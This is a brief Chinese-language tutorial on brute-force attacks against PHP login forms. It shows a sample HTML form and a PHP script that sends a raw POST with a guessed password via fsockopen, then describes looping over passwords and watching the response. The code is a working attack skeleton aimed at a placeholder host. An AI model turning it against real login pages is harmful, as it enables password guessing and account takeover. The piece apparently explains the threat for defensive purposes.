暴力攻击 PHP 脚本 初探

考虑下面的HTML表单：

CODE:

<form action="http://example.org/login.php" method="POST">

<p>Username: <input type="text" name="username" /></p>

<p>Password: <input type="password" name="password" /></p>

<p><input type="submit" /></p>

</form>

 

攻击者会察看这个表单并建立一段脚本来POST合法的数据给http://example.org/login.php：

<?php

  $username = 'victim';
  $password = 'guess';

  $content = "username=$username&password=$password";
  $content_length = strlen($content);

  $http_request = '';
  $http_response = '';

  $http_request .= "POST /login.php HTTP/1.1\r\n";

  $http_request .= "Host: example.org\r\n";

  $http_request .= "Content-Type: application/x-www-form-urlencoded\r\n";

  $http_request .= "Content-Length: $content_length\r\n";

  $http_request .= "Connection: close\r\n";

  $http_request .= "\r\n";

  $http_request .= $content;

  if ($handle = fsockopen('example.org', 80))

  {

    fputs($handle, $http_request);

 

    while (!feof($handle))

    {

      $http_response .= fgets($handle, 1024);

    }

    fclose($handle);

    /* Check Response */

  }

  else

  {

    /* Error */

  }

  ?>

使这段脚本，攻击者还可以简单地加入一个循环来继续尝试不同的密码，并在每次尝试后检查$http_response变量。一旦$http_response变量有变化，就可以认为猜测到了正确的密码。